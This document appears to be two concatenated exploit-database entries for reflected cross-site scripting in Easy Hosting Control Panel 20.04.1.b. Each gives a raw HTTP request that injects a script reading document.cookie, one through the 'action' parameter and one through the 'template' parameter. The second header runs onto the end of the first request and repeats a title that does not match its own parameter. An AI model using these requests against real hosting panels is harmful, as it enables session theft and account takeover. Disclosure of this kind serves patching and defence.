# Exploit Title: Easy Hosting Control Panel (EHCP) 20.04.1.b - Reflected Cross-Site Scripting in the List MySQL Databases function via action parameter.
# Date: Aug 18, 2025
# Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://www.ehcp.net/
# Software Link: https://www.ehcp.net/?p=402
# Version: 20.04.1.b
# Tested on: macOS
# CVE : CVE-2025-50858

GET /ehcp/index.php?op=domainop&action=<script>alert(document.cookie)</script> HTTP/1.1
Host: 192.168.1.68
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=cogirb9l3nr2u2at33i4ameb8h
Upgrade-Insecure-Requests: 1
Priority: u=0, i# Exploit Title: Easy Hosting Control Panel (EHCP) 20.04.1.b - Reflected Cross-Site Scripting in the List MySQL Databases function via action parameter.




# Date: Aug 18, 2025
# Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://www.ehcp.net/
# Software Link: https://www.ehcp.net/?p=402
# Version: 20.04.1.b
# Tested on: macOS
# CVE : CVE-2025-50858

GET /ehcp/?op=changetemplate&template=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: 192.168.1.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: PHPSESSID=q1b714ip4gru2no35e7vgv0591; acopendivids=domains,ftpusers,system; acgroupswithpersist=nada
Upgrade-Insecure-Requests: 1
Priority: u=0, i